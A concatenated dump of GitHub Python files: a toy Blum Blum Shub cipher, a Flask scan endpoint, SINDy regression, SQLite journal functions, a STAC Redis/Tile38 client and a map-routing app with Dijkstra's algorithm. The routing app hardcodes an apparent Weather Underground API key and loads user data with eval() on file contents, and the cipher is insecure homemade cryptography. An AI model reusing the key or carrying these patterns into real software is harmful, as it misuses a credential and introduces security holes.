%s and %s' %(p,q))\n\ndef encrypt():\n\tmessagelist = []\n\trando = []\n\t\n\tmessage = input('Please enter your message : ').replace(' ', '').lower()\n\twhile not message.isalpha(): # message can only be letters\n\t\tprint('Please input only letters!')\n\t\tmessage = input('Please enter your message: ').replace(' ', '').lower()\n\tpublickey = int(input('Please enter the public key: '))\n\n\tfor i in range(len(message)): # change letters to respective numbers\n\t\tmessagelist.append(ascii_lowercase.index(message[i])) \n\t\n\tseed = randint(100,10000)\n\twhile seed ** 4 < publickey: # seed squared > square root of n\n\t\tseed = randint(100,10000)\n\t\tif gcd(seed, publickey) != 1: # coprime if gcd = 1\n\t\t\tcontinue\n\tprint('Your seed is :', seed)\n\t\n\tinitno = seed * seed\n\tfor i in range(len(messagelist)): # number of int based on length of message\n\t\tif i == 0:\n\t\t\trando.append(initno % publickey)\n\t\telse:\n\t\t\trando.append((initno ** 2 ** i) % publickey) # xi = x0 ** i mod N\n\t\t\n\tfor i in range(len(messagelist)): # C = (M + x) mod 26\n\t\tmessagelist[i] = ascii_lowercase[(messagelist[i] + rando[i]) % 26]\n\tprint('Ciphertext :', ''.join(messagelist))\n\tprint('x-value :',rando[len(rando)-1]) # last random int produced\n\n\t\ndef decrypt():\n\trando = []\n\tcipherlist = []\n\t\n\tprivatep = int(input('Please enter the first private key : '))\n\tprivateq = int(input('Please enter the second private key : '))\n\tciphertext = input('Please enter the ciphertext : ').replace(' ', '')\n\tx = int(input('Please enter the x-value: '))\n\tpublickey = privatep * privateq\n\t\n\tfor i in range(len(ciphertext)):\n\t\tcipherlist.append(ascii_lowercase.index(ciphertext[i]))\n\t\n\tp = pow(x, int((privatep + 1)/4)** (len(ciphertext)-1), privatep) # formula\n\tq = pow(x, int((privateq + 1)/4)** (len(ciphertext)-1), privateq) # formula\n\tinitno = (privatep * q * pow(privatep,privateq-2,privateq) + privateq * p * pow(privateq,privatep-2,privatep)) % publickey\n\t\n\tfor i in range(len(cipherlist)):\n\t\tif i == 0:\n\t\t\trando.append(initno % publickey) \n\t\telse:\n\t\t\trando.append((initno ** 2 ** i) % publickey) # xi = x0 ** i mod N\n\n\tfor i in range(len(cipherlist)): # M = (C - x) mod N\n\t\tcipherlist[i] = ascii_lowercase[(cipherlist[i] - rando[i]) % 26]\n\tprint('This is your plaintext : ' + ''.join(cipherlist))\n\n\ndef title():\n\t\"\"\"Something silly.\"\"\"\n\tprint(\"\"\" ____ _ _ _ _ _ \n | _ \\| | | | | | | | | | \n | |_) | |_ _ _ __ ___ | |__ | |_ _ _ __ ___ ___| |__ _ _| |__ \n | _ <| | | | | '_ ` _ \\ | '_ \\| | | | | '_ ` _ \\ / __| '_ \\| | | | '_ \\ \n | |_) | | |_| | | | | | | | |_) | | |_| | | | | | | \\__ \\ | | | |_| | |_) |\n |____/|_|\\__,_|_| |_| |_| |_.__/|_|\\__,_|_| |_| |_| |___/_| |_|\\__,_|_.__/ \n \n in Python \n \"\"\")\n\ntitle()\n\t\nwhile True:\n\t\n\tprint(\"=== Main Menu ===\")\n\tprint('1. Make keys\\n2. Encrypt\\n3. Decrypt')\n\tchoice = input('What would you like to do?: ')\n\tprint('')\n\tif choice == '1': # make keys\n\t\tkey()\n\t\tprint('')\n\t\tcontinue\n\telif choice == '2': # encryption\n\t\tencrypt()\n\t\tprint('')\n\t\tcontinue\n\telif choice == '3': # decryption\n\t\tdecrypt()\n\t\tprint('')\n\t\tcontinue\n\telse:\n\t\tprint('Invalid choice! 
Enter 1, 2, or 3.')\n\t\tprint('')\n\t\tcontinue\n","repo_name":"Sonvanelle/BBS-Py","sub_path":"BBS(itsdoneandshit).py","file_name":"BBS(itsdoneandshit).py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7196327034","text":"from flask import Blueprint, request, jsonify\nfrom utils.auth_utils import authenticated\nfrom utils.socketio_utils import send_message_to_client\nfrom db.qr_location_repository import QrLocationRepository\nfrom db.user_exercise_repository import UserExerciseRepository\nimport processing.action_recognition\nimport concurrent.futures\nimport threading\nimport logging\n\nscan_bp = Blueprint('scan', __name__)\nqr_location_repository = QrLocationRepository()\nuser_exercise_repository = UserExerciseRepository()\nexecutor = concurrent.futures.ThreadPoolExecutor()\n\nbackground_tasks = {}\ncancel_flags = {}\n\n\ndef on_scan_task_complete(future, user_id, qr_id):\n    logging.info(f'on_scan_task_complete user_id: {user_id}, qr_id: {qr_id}')\n    task = background_tasks.get(qr_id)\n    if task:\n        del background_tasks[qr_id]\n    try:\n        result = future.result()\n        logging.info(f'result: {result}')\n        if result == 'ok':\n            ue = user_exercise_repository.find_all_by_user_id(user_id, 1)[0]\n            send_message_to_client(user_id, 'scan_finish', ue)\n        else:\n            send_message_to_client(user_id, 'scan_finish_err')\n    except Exception as e:\n        logging.exception(e)\n        send_message_to_client(user_id, 'scan_finish_err')\n\n\n\n@scan_bp.route('/<qr_id>', methods=['GET'])\n@authenticated\ndef scan(qr_id):\n    try:\n        user_id = int(request.user['user_id'])\n        qr_location = qr_location_repository.find_by_qr_id(qr_id)\n        cancel_flag = threading.Event()\n        task = executor.submit(processing.action_recognition.run_action_form_recognition, user_id, qr_location, cancel_flag)\n        task.add_done_callback(lambda future: on_scan_task_complete(future, user_id, qr_id))\n        background_tasks[qr_id] = task\n        cancel_flags[qr_id] = cancel_flag\n\n        return jsonify({'message': 'Escaneo iniciado'}), 200\n    except Exception as e:\n        logging.exception(e)\n        return jsonify({'message': 'Error inesperado', 'error': str(e)}), 500\n\n\n@scan_bp.route('/cancel/<qr_id>', methods=['GET'])\n@authenticated\ndef cancel(qr_id):\n    try:\n        task = background_tasks.get(qr_id)\n        if task:\n            cancel_flag = cancel_flags.get(qr_id)\n            if cancel_flag:\n                cancel_flag.set()\n                del background_tasks[qr_id]\n                return jsonify({'message': f'Escaneo del QR {qr_id} cancelado'}), 200\n            else:\n                return jsonify({'message': f'El escaneo del QR {qr_id} no se pudo cancelar'}), 500\n        else:\n            return jsonify({'message': f'QR {qr_id} no está en proceso'}), 404\n    except Exception as e:\n        logging.exception(e)\n        return jsonify({'message': 'Error inesperado', 'error': str(e)}), 500\n","repo_name":"alexiscomerci/tr_back","sub_path":"blueprints/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3022079098","text":"import numpy as np\n\ndef sparsify(theta, dX, _lambda, dimensions):\n    \"\"\"sparse solution for dX/dt = theta(X) * Xi\n\n    @param theta : each col is polynomially expanded function of row data\n    @param dX : approximate derivative of time-series data\n\n    returns xi : sparse approximation for dynamics underlying time series data\n    \"\"\"\n\n    xi, _, _, _ = np.linalg.lstsq(theta, dX)\n    \n    for i in range(10):\n        xi = _regularize(xi, _lambda)\n        xi = _iterateRegression(xi, theta, 
dX, _lambda, dimensions)\n return xi\n\ndef _regularize(xi, _lambda):\n \"clips small elements (to zero)\"\n\n smallIdx = abs(xi)<=_lambda\n xi[smallIdx] = 0\n return xi\n\ndef _iterateRegression(xi, theta, dX, _lambda, dimensions):\n \"performs least-squares iteration on a subset of indices above lambda threshold\"\n\n if dimensions == 1:\n bigIdx = abs(xi[:]) > _lambda\n tempXi, _, _, _ = np.linalg.lstsq(theta[:, bigIdx], dX)\n xi[bigIdx] = tempXi\n \n else:\n for dim in range(dimensions):\n # bigIdx = [i for i,v in enumerate(xi[:, dim]) if abs(v) > _lambda]\n bigIdx = abs(xi[:, dim]) > _lambda\n tempXi, _, _, _ = np.linalg.lstsq(theta[:, bigIdx], dX[:, dim])\n xi[bigIdx, dim] = tempXi\n \n return xi","repo_name":"max-hoffman/dimspan-py","sub_path":"dimspan/sindy/sparsify.py","file_name":"sparsify.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"15500190260","text":"import sqlite3\nfrom models import Entry\nfrom models import Mood\n\ndef get_all_entries():\n \"\"\"Gets all entries\"\"\"\n\n with sqlite3.connect(\"./dailyjournal.sqlite3\") as conn:\n conn.row_factory = sqlite3.Row\n db_cursor = conn.cursor()\n db_cursor.execute(\"\"\"\n SELECT\n e.id,\n e.concept,\n e.date,\n e.mood_id,\n e.entry,\n m.label\n FROM Entry e\n JOIN Mood m\n ON m.id = e.mood_id\n \"\"\")\n\n entries = []\n dataset = db_cursor.fetchall()\n\n for row in dataset:\n entry = Entry(row['id'], row['concept'], row['date'], row['mood_id'],\n row['entry'])\n \n mood = Mood(row['id'], row['label'])\n entry.mood = mood.__dict__\n\n entries.append(entry.__dict__)\n\n return entries\n\ndef get_single_entry(id):\n \"\"\"Gets single entry by id\"\"\"\n\n with sqlite3.connect(\"./dailyjournal.sqlite3\") as conn:\n conn.row_factory = sqlite3.Row\n db_cursor = conn.cursor()\n db_cursor.execute(\"\"\"\n SELECT\n e.id,\n e.concept,\n e.date,\n e.mood_id,\n e.entry\n FROM 'Entry' e\n WHERE e.id = ?\n \"\"\", ( id, ))\n\n data = db_cursor.fetchone()\n\n entry = Entry(data['id'], data['concept'], data['date'], data['mood_id'],\n data['entry'])\n\n return entry.__dict__\n\ndef get_entries_by_search(searched_term):\n \"\"\"Gets entires by searched term\"\"\"\n\n with sqlite3.connect(\"./dailyjournal.sqlite3\") as conn:\n conn.row_factory = sqlite3.Row\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n SELECT\n e.id,\n e.concept,\n e.date,\n e.mood_id,\n e.entry\n from Entry e\n WHERE e.concept LIKE ?\n \"\"\", (f'%{searched_term}%',))\n\n\n entries = []\n dataset = db_cursor.fetchall()\n\n for row in dataset:\n entry = Entry(row['id'], row['concept'], row['date'], row['mood_id'] , row['entry'])\n entries.append(entry.__dict__)\n\n return entries\n\ndef delete_entry(id):\n \"\"\"Deletes single entry by id\"\"\"\n\n with sqlite3.connect(\"./dailyjournal.sqlite3\") as conn:\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n DELETE FROM 'Entry'\n WHERE id = ?\n \"\"\", (id, ))\n\ndef create_journal_entries(new_entry):\n \"\"\"Creates a new entry\"\"\"\n\n with sqlite3.connect(\"./dailyjournal.sqlite3\") as conn:\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n INSERT INTO Entry\n ( concept, date, mood_id, entry )\n VALUES\n ( ?, ?, ?, ? 
);\n \"\"\", (new_entry['concept'], new_entry['date'],\n new_entry['mood_id'], new_entry['entry'], ))\n\n id = db_cursor.lastrowid\n new_entry['id'] = id\n\n\n return new_entry","repo_name":"erniefabian3rd/daily-journal-server","sub_path":"views/entry_requests.py","file_name":"entry_requests.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42388757755","text":"from dataclasses import dataclass\nfrom typing import Optional, Any, TypeVar\n\n\nT = TypeVar(\"T\")\n\n\ndef from_str(x: Any) -> str:\n assert isinstance(x, str)\n return x\n\n\ndef from_int(x: Any) -> int:\n assert isinstance(x, int) and not isinstance(x, bool)\n return x\n\n\ndef from_none(x: Any) -> Any:\n assert x is None\n return x\n\n\ndef from_union(fs, x):\n for f in fs:\n try:\n return f(x)\n except:\n pass\n assert False\n\n\ndef from_float(x: Any) -> float:\n assert isinstance(x, (float, int)) and not isinstance(x, bool)\n return float(x)\n\n\ndef to_float(x: Any) -> float:\n assert isinstance(x, float)\n return x\n\n\n@dataclass\nclass Doc:\n journal_id: str\n rank: int\n normalized_name: str\n display_name: str\n webpage: Optional[str]\n paper_count: int\n citation_count: int\n created_date: str\n version: float\n issn: Optional[str]\n\n @staticmethod\n def from_dict(obj: Any) -> 'Doc':\n assert isinstance(obj, dict)\n journal_id = from_str(obj.get(\"JournalId\"))\n rank = from_int(obj.get(\"Rank\"))\n normalized_name = from_str(obj.get(\"NormalizedName\"))\n display_name = from_str(obj.get(\"DisplayName\"))\n webpage = from_union([from_str, from_none], obj.get(\"Webpage\"))\n paper_count = from_int(obj.get(\"PaperCount\"))\n citation_count = from_int(obj.get(\"CitationCount\"))\n created_date = from_str(obj.get(\"CreatedDate\"))\n version = from_float(obj.get(\"_version_\"))\n issn = from_union([from_str, from_none], obj.get(\"Issn\"))\n return Doc(journal_id, rank, normalized_name, display_name, webpage, paper_count, citation_count, created_date, version, issn)\n\n def to_dict(self) -> dict:\n result: dict = {}\n result[\"JournalId\"] = from_str(self.journal_id)\n result[\"Rank\"] = from_int(self.rank)\n result[\"NormalizedName\"] = from_str(self.normalized_name)\n result[\"DisplayName\"] = from_str(self.display_name)\n result[\"Webpage\"] = from_union([from_str, from_none], self.webpage)\n result[\"PaperCount\"] = from_int(self.paper_count)\n result[\"CitationCount\"] = from_int(self.citation_count)\n result[\"CreatedDate\"] = from_str(self.created_date)\n result[\"_version_\"] = to_float(self.version)\n result[\"Issn\"] = from_union([from_str, from_none], self.issn)\n return result\n\n","repo_name":"sonne-academic/solr-utils","sub_path":"data/mag/data_classes/journal_mag.py","file_name":"journal_mag.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70214761126","text":"from PIL import Image\nfrom pathlib import Path\n\n\nclass ScaleZip:\n\n def __init__(self, filename, size):\n self.filename = filename\n self.size = size\n self.temp_directory = Path(\"unzipped-{}\".format(filename[:-4]))\n\n def process_files(self):\n '''Scale each image in the directory to given size'''\n for filename in self.temp_directory.iterdir():\n if str(filename)[-3:] == 'jpg':\n im = Image.open(str(filename))\n scaled = im.resize(self.size)\n 
scaled.save(str(filename))\n","repo_name":"H4wking/lab7","sub_path":"task3/scale_zip.py","file_name":"scale_zip.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41945693061","text":"\"\"\"transactions extension client.\"\"\"\n\nimport logging\nimport asyncio\nimport json\nfrom datetime import datetime\nimport redis\nfrom redis.commands.json.path import Path\n\n\nimport attr\nfrom stac_pydantic.shared import DATETIME_RFC339\n\nfrom stac_fastapi.nodb.config import Tile38Settings\nfrom stac_fastapi.nodb.serializers import CollectionSerializer, ItemSerializer\nfrom stac_fastapi.nodb.session import Session\nfrom stac_fastapi.extensions.third_party.bulk_transactions import (\n BaseBulkTransactionsClient,\n Items,\n)\nfrom stac_fastapi.types import stac as stac_types\nfrom stac_fastapi.types.core import BaseTransactionsClient\nfrom stac_fastapi.types.errors import ConflictError, ForeignKeyError, NotFoundError\nfrom stac_fastapi.types.links import CollectionLinks\n\nlogger = logging.getLogger(__name__)\n\nCOLLECTIONS = []\n\n@attr.s\nclass TransactionsClient(BaseTransactionsClient):\n \"\"\"Transactions extension specific CRUD operations.\"\"\"\n\n session: Session = attr.ib(default=attr.Factory(Session.create_from_env))\n settings = Tile38Settings()\n tile38_client = settings.create_tile_38_client\n redis_client = settings.create_redis_client\n\n def create_item(self, model: stac_types.Item, **kwargs):\n \"\"\"Create item.\"\"\"\n base_url = str(kwargs[\"request\"].base_url)\n\n ##### implement after bulk sync post request\n # # If a feature collection is posted\n # if model[\"type\"] == \"FeatureCollection\":\n # bulk_client = BulkTransactionsClient()\n # processed_items = [\n # bulk_client._preprocess_item(item, base_url)\n # for item in model[\"features\"]\n # ]\n # return_msg = f\"Successfully added {len(processed_items)} items.\"\n # bulk_client.bulk_sync(processed_items)\n\n # return return_msg\n\n # If a single item is posted\n self.check_collection_not_exists(model)\n\n if self.redis_client.json().get(model[\"id\"]):\n raise ConflictError(\n f\"Item {model['id']} in collection {model['collection']} already exists\"\n )\n\n data = ItemSerializer.stac_to_db(model, base_url)\n\n self.redis_client.json().set(model[\"id\"], Path.rootPath(), data)\n\n ### run async code for tile38 client\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n coroutine = self.create_geojson_object(data)\n loop.run_until_complete(coroutine)\n\n return ItemSerializer.db_to_stac(data, base_url)\n\n # async example for tile38 client\n async def create_geojson_object(self, item: stac_types.Item):\n ### tile 38 def function\n # loop = asyncio.new_event_loop()\n # asyncio.set_event_loop(loop)\n # coroutine = self.jset_collection(model)\n # response = loop.run_until_complete(coroutine)\n # return str(response)\n\n await self.tile38_client.set(\"items\", item[\"id\"]).object(item[\"geometry\"]).exec()\n # response = await self.tile38_client.get(\"items\", item[\"id\"]).asObject()\n\n # return response.object\n\n def create_collection(self, model: stac_types.Collection, **kwargs):\n \"\"\"Create collection.\"\"\"\n base_url = str(kwargs[\"request\"].base_url)\n collection_links = CollectionLinks(\n collection_id=model[\"id\"], base_url=base_url\n ).create_links()\n model[\"links\"] = collection_links\n\n if self.redis_client.json().get(model[\"id\"]):\n raise ConflictError(f\"Collection {model['id']} 
already exists\")\n\n self.redis_client.json().set(model[\"id\"], Path.rootPath(), model)\n self.redis_client.sadd(\"collections\", model[\"id\"])\n\n collection = self.redis_client.json().get(model[\"id\"])\n return CollectionSerializer.db_to_stac(collection, base_url)\n\n def check_collection_not_exists(self, model):\n if not self.redis_client.json().get(model[\"collection\"]):\n raise ForeignKeyError(f\"Collection {model['collection']} does not exist\")\n\n def check_collection_not_found(self, collection_id):\n if not self.redis_client.json().get(collection_id):\n raise NotFoundError(f\"Collection {collection_id} not found\")\n\n def check_item_not_exists(self, item_id, collection_id):\n if not self.redis_client.json().get(item_id):\n raise NotFoundError(\n f\"Item {item_id} in collection {collection_id} doesn't exist\"\n )\n\n def update_item(self, item: stac_types.Item, **kwargs):\n \"\"\"Update item.\"\"\"\n base_url = str(kwargs[\"request\"].base_url)\n now = datetime.utcnow().strftime(DATETIME_RFC339)\n item[\"properties\"][\"updated\"] = str(now)\n self.check_collection_not_exists(item)\n self.check_item_not_exists(item[\"id\"], item[\"collection\"])\n self.delete_item(item[\"id\"], item[\"collection\"])\n self.create_item(item, **kwargs)\n\n return ItemSerializer.db_to_stac(item, base_url)\n\n def update_collection(self, model: stac_types.Collection, **kwargs):\n \"\"\"Update collection.\"\"\"\n base_url = str(kwargs[\"request\"].base_url)\n self.check_collection_not_found(model[\"id\"])\n self.delete_collection(model[\"id\"])\n self.create_collection(model, **kwargs)\n\n return CollectionSerializer.db_to_stac(model, base_url)\n\n def delete_item(self, item_id: str, collection_id: str, **kwargs):\n \"\"\"Delete item.\"\"\"\n self.check_item_not_exists(item_id, collection_id)\n self.redis_client.json().delete(item_id, Path.rootPath())\n\n def delete_collection(self, collection_id: str, **kwargs):\n \"\"\"Delete collection.\"\"\"\n self.check_collection_not_found(collection_id)\n self.redis_client.json().delete(collection_id, Path.rootPath())\n self.redis_client.srem(\"collections\", collection_id)\n\n\n# @attr.s\n# class BulkTransactionsClient(BaseBulkTransactionsClient):\n# \"\"\"Postgres bulk transactions.\"\"\"\n\n# session: Session = attr.ib(default=attr.Factory(Session.create_from_env))\n\n# def __attrs_post_init__(self):\n# \"\"\"Create es engine.\"\"\"\n# settings = ElasticsearchSettings()\n# self.client = settings.create_client\n\n# def _preprocess_item(self, model: stac_types.Item, base_url) -> stac_types.Item:\n# \"\"\"Preprocess items to match data model.\"\"\"\n# if not self.client.exists(index=\"stac_collections\", id=model[\"collection\"]):\n# raise ForeignKeyError(f\"Collection {model['collection']} does not exist\")\n\n# if self.client.exists(index=\"stac_items\", id=model[\"id\"]):\n# raise ConflictError(\n# f\"Item {model['id']} in collection {model['collection']} already exists\"\n# )\n\n# item = ItemSerializer.stac_to_db(model, base_url)\n# return item\n\n# def bulk_sync(self, processed_items):\n# \"\"\"Elasticsearch bulk insertion.\"\"\"\n# actions = [\n# {\"_index\": \"stac_items\", \"_source\": item} for item in processed_items\n# ]\n# helpers.bulk(self.client, actions)\n\n# def bulk_item_insert(self, items: Items, **kwargs) -> str:\n# \"\"\"Bulk item insertion using es.\"\"\"\n# transactions_client = TransactionsClient()\n# transactions_client._create_item_index()\n# try:\n# base_url = str(kwargs[\"request\"].base_url)\n# except Exception:\n# base_url = 
\"\"\n# processed_items = [\n# self._preprocess_item(item, base_url) for item in items.items.values()\n# ]\n# return_msg = f\"Successfully added {len(processed_items)} items.\"\n\n# self.bulk_sync(processed_items)\n\n# return return_msg\n","repo_name":"jonhealy1/stac-fastapi-nodb","sub_path":"stac_fastapi/nodb/stac_fastapi/nodb/transactions.py","file_name":"transactions.py","file_ext":"py","file_size_in_byte":7658,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"38013122878","text":"#Chris Wallace\n#Pythoneas\n\n#T I M E L O G\n#04/09/17: 2.0 hr\n#04/14/17: 0.5 hr\n#04/15/17: 5.0 hr\n#04/16/17: 2.0 hr\n#04/17/17: 2.5 hr\n#04/20/17: 5.0 hr\n#04/21/17: 1.0 hr\n#04/23/17: 1.0 hr\n#04/24/17: 2.0 hr\n#04/25/17: 3.0 hr\n#04/26/17: 3.0 hr\n#04/27/16: 4.0 hr\n#04/28/17: 3.0 hr\n#04/29/17: 5.0 hr\n#04/30/17: 4.0 hr\n#05/01/17: 4.0 hr\n#05/02/17: 2.0 hr\n#05/03/17: 3.0 hr\n\n#TOTAL: 52.0 hr\n\n################################################################################\n#BACK END\n################################################################################\nimport math\nimport random\n#Used for Weather Underground API\nimport urllib.request\nimport json\n\n#Use for user data and file reading\n#File IO code taken from strings section of course wedbapge\n#https://www.cs.cmu.edu/~112/notes/notes-strings.html#basicFileIO\nwith open(\"users.txt\", \"rt\") as f:\n userDict = eval(f.read())\n\n#Used for weather underground API\napikey = \"4636dc7c5e68a48a\"\nstate = None\ncity = None\napistuff = (0, 0, 0)\n#Code taken from Weather Underground API Code Samples page (python section)\n#https://www.wunderground.com/weather/api/d/docs?d=resources/code-samples&MR=1\n#With help using Python documentation for urllib.request and json modules\n#https://docs.python.org/3/library/urllib.request.html\n#https://docs.python.org/2/library/json.html\ndef useAPIOnce():\n if((city != None) and (state != None)):\n url = 'http://api.wunderground.com/api/%s/' % apikey\n url += 'geolookup/conditions/q/%s/%s.json' % (state, city)\n f = urllib.request.urlopen(url)\n json_string = f.read().decode(\"utf-8\")\n parsed_json = json.loads(json_string)\n location = parsed_json['location']['city']\n temp = float(parsed_json['current_observation']['feelslike_f'])\n wind = float(parsed_json['current_observation']['wind_mph'])\n precip = float(parsed_json['current_observation']['precip_today_metric'])\n rainsnow = None\n if(precip > 0):\n if(temp < 32):\n rainsnow = \"snow\"\n else:\n rainsnow = \"rain\"\n apistuff = (temp, wind, rainsnow)\n f.close()\n\ndef distance(x1, y1, x2, y2):\n #Find Cartesian Distance\n return math.sqrt((x2-x1)**2 + (y2-y1)**2)\n\ndef testMap():\n #Test Graph for Dijksta's Algorithm\n a = Node(50, 100, \"a\")\n b = Node(250, 500, \"b\")\n c = Node(650, 400, \"c\")\n d = Node(300, 150, \"d\")\n e = Node(400, 50, \"e\")\n a.addAdj(b)\n a.addAdj(d)\n a.addAdj(e)\n c.addAdj(b)\n c.addAdj(d)\n c.addAdj(e)\n e.addAdj(d)\n d.addAdj(b)\n tmap = Map()\n tmap.nodes.add(a)\n tmap.nodes.add(a)\n tmap.nodes.add(b)\n tmap.nodes.add(c)\n tmap.nodes.add(d)\n tmap.nodes.add(e)\n print(tmap)\n return tmap\n\n#MAP\nclass Map(object):\n def __init__(self):\n #Keep track of essential lists/sets for Dijkstra's algorithm\n self.visited = set()\n self.nodes = set()\n self.tree = list()\n self.path = list()\n self.possNodes = set()\n\n def __str__(self):\n #Effectively print all node and edge data\n stri = \"\"\n for node in self.nodes:\n for adj in node.adjs:\n stri = 
stri + \"\\n%s - %s %f\" % (node.name, adj.name, \n node.adjs[adj].weight)\n stri = stri + \"\\n\"\n return stri\n\n def reset(self):\n #Refresh map (used for returning to home screen)\n self.visited = set()\n self.tree = list()\n self.path = list()\n self.nodes = set()\n print(\"TRIGGERED\")\n\n def isPossible(self, start, end, node = None):\n #Finds if path is possible\n if(node == None):\n node = start\n self.possNodes.add(start)\n if(node == end):\n return True\n else:\n for node2 in node.adjs: \n if(node2 not in self.possNodes):\n self.possNodes.add(node2)\n solve = self.isPossible(start, end, node2)\n if(solve == True):\n return solve\n return False\n\n def dijkstra(self, start, end, i = 0):\n #Dijkstra's Algorithm for mapping the shortest path\n #Initialize tentative distance of start node\n self.possNodes = set()\n if(not self.isPossible(start, end)): return \"error\"\n self.visited = set()\n self.tree = list()\n self.path = list()\n for node in self.nodes:\n node.reset()\n start.tentD = 0\n #Print check\n #print(\"START %s \\nEND %s\" % (start.name, end.name))\n #print(\"VISITED\")\n self.visited.add(start)\n for node in self.visited:\n #print(node.name)\n pass\n #Run until end not has been visited\n while end not in self.visited:\n #Reset valid nodes\n valid = set()\n for node in self.visited:\n for adj in node.adjs:\n #Make sure not already visited and adjascent to a visited\n ch = (node.adjs[adj].weights[i] != math.inf)\n if((adj not in self.visited) and (adj in node.adjs) and ch):\n valid.add(adj)\n if(node.tentD + node.adjs[adj].weights[i] < adj.tentD):\n #Update tentative distance\n #print(adj.closestTent)\n adj.closestTent = node\n adj.tentD = node.tentD + node.adjs[adj].weights[i]\n #Print Check\n #print(\"VALID\")\n for node in valid:\n #print(node.name + \" from \" + node.closestTent.name)\n pass\n #Initialize minimum distance and minimum node\n minD = None\n minN = None\n #Find minimums\n for near in valid:\n if(minD == None):\n minD = near.tentD\n minN = near\n if(near.tentD < minD):\n minD = near.tentD\n minN = near\n #Print check\n #print(\"PICK %s\" % minN.name)\n self.visited.add(minN) #Add closest node to visited\n #Print Check\n #print(\"VISITED\")\n for node in self.visited:\n #print(node.name, end = \" \")\n pass\n #print(\"\")\n #Add tuple to represent edge\n self.tree.append((minN.closestTent, minN))\n #Print Check\n count = 0\n #print(\"TREE\")\n for tup in self.tree:\n #print(count, end = \" \")\n #print(tup[0].name, tup[1].name)\n count += 1\n #Extract specific path\n return self.findPath(start, end)\n\n def findPath(self, start, end):\n #Give list of nodes in path\n final = [end] #Initialize with end and move back\n prev = end #Keep track of last node\n #End when both start and end in path\n while start not in final:\n for tup in self.tree:\n #Found node that precedes last node\n if(tup[1] == prev):\n final.insert(0, tup[0]) #Place in beginning of list\n prev = tup[0]\n self.path = final\n #Print Check\n #print(\"PATH\")\n for node in self.path:\n #print(node.name, end = \" \")\n pass\n #print(\"\")\n return self.path\n\n def findNode(self, x, y, r):\n #Determine which node was clicked based on cartesian coordinates\n for node in self.nodes:\n if((x <= node.x + r) and (x >= node.x - r) and (y <= node.y + r)\n and (y >= node.y - r)):\n return node\n\n#NODE\nclass Node(object):\n def __init__(self, x, y, n):\n #Essential node characteristics\n self.x = x\n self.y = y #Cartesian coordinates\n self.name = n\n self.adjs = dict() #Dictionary of adjascent nodes 
mapping to edges\n        self.tentD = math.inf \n        self.closestTent = None #To be implemented in Dijkstra's Algorithm\n\n    def __str__(self):\n        #Print Essential info of node\n        return \"%s (%d,%d)\" % (self.name, self.x, self.y)\n\n    def reset(self):\n        #Reset values needed for Dijkstra's Algorithm\n        self.tentD = math.inf\n        self.closestTent = None\n\n    def addAdj(self, other, od, st, prefW, prefS, c, s):\n        #Add adjacent node\n        d = distance(self.x, self.y, other.x, other.y)\n        #Add weighted edge to both dictionaries\n        self.adjs[other] = Edge(self, other, d, od, st, prefW, prefS, c, s)\n        other.adjs[self] = Edge(other, self, d, od, st, prefW, prefS, c, s)\n\n    def removeAdj(self, other):\n        #Remove an adjacent node from the node's dictionary\n        if((other not in self.adjs) or (self not in other.adjs)):\n            return \n        del self.adjs[other]\n        del other.adjs[self]\n\n#EDGE\nclass Edge(object):\n    def __init__(self,node1,node2,distance,outdoors,stairs,prefW,prefS,c,s):\n        #Specify important details about the edge\n        self.node1 = node1\n        self.node2 = node2\n        self.outdoors = outdoors\n        self.weatherweight = apistuff #(temp, wind, rain/snow) tuple; apistuff is presumably defined earlier in the original file\n        self.stairs = stairs\n        self.weights = [distance]*3\n        #Modify weights by data and user preference\n        if(self.outdoors):\n            (t, w, rs) = self.weatherweight\n            weath = abs(50 - t) + w\n            if(rs == \"rain\"):\n                weath += 50\n            elif(rs == \"snow\"):\n                weath += 100\n            self.weights[1] += ((prefW * weath)/self.weights[0])\n        if(self.stairs):\n            if(prefS == 2):\n                #Add longest possible edge (Diagonal of window)\n                self.weights[2] = math.inf\n            else:\n                self.weights[2] += prefS * 50\n\n    def __str__(self):\n        #Return a string representing an edge\n        return \"%s - %s, %f\" % (self.node1.name, self.node2.name, \n                                self.weights[0])\n\n    def getCoords(self):\n        #Find coordinates of an edge for drawing purposes\n        coords = []\n        coords.append(self.node1.x)\n        coords.append(self.node1.y)\n        coords.append(self.node2.x)\n        coords.append(self.node2.y)\n        return coords\n\n################################################################################\n#FRONT END\n################################################################################\n\n#Run function and event based animations framework from course website\nfrom tkinter import *\nfrom tkinter import messagebox, simpledialog\n\ndef init(data):\n    #Initialize data\n    data.marginx = 50\n    data.marginy = 50\n    data.map = Map()\n    #data.map = testMap()\n    data.r = 5\n    data.start = None\n    data.end = None\n    data.path = None\n    data.circs = []\n    data.screen = \"home\"\n    data.mode = \"\"\n    data.nextchar=chr(ord(\"a\")+(len(data.map.nodes))%26)\n    data.firstNode = None\n    data.secondNode = None\n    data.undoN = []\n    data.undoE = []\n    data.gridSpacing = 40\n    data.pathindex = 0\n    data.sp = None\n    data.wp = None\n    data.user = None\n    data.password = None\n    data.userkey = None\n    data.mapStr = \"\"\n    data.fileName = None\n    data.fsstr = \"\"\n    data.ssstr = \"\"\n    data.clicked = None\n    data.fileSpots1 = list()\n    data.fileSpots2 = list()\n    data.userList = list()\n    data.otherList = list()\n    #Image Code taken from Misc Tkinter Demos on course webpage\n    